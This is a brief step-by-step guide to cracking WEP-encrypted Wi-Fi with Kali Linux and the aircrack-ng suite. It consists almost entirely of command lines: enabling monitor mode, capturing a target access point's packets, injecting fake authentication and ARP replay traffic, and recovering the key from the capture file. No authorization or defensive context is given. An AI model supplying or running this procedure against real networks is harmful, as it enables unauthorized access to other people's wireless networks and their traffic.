Hack WEP Wi-Fi With Kali Linux & Aircrack-ng

list all of the wireless cards that support monitor (not injection) mode :

airmon-ng

put interface on monitor mode :

airmon-ng start [wifi interface name]
airmon-ng start wlan0

list all of the wireless networks in your area :

airodump-ng [monitor interface name]
airodump-ng mon0

WEP encrypted data packets needs to be captured :

airodump-ng -w [file name] -c [chanel name] --bssid [bssid] [monitor interface name]
airodump-ng -w /root/Desktop/hack01 -c 1 --bssid 78:54:2E:D6:9F:D5 wlan1mon

To speed up the IV’s open a third terminal window letting the second run capturing the data :

aireplay-ng -1 0 -a [bssid] [monitor interface name]
aireplay-ng -1 0 -a 78:54:2E:D6:9F:D5 wlan1mon

This will begin sending out ARP request and the data and the beacons should begin to grow quickly :

aireplay-ng -3 -b [bssid] [monitor interface name]
aireplay-ng -3 -b 78:54:2E:D6:9F:D5 wlan1mon

after collecting enough data (20000 is enough but 100000 is better) :

aircrack-ng [file name]
aircrack-ng hack01.cap

References :
http://www.wirelesshack.org/step-by-step-kali-linux-and-wireless-hacking-basics-wep-hacking-part-3.html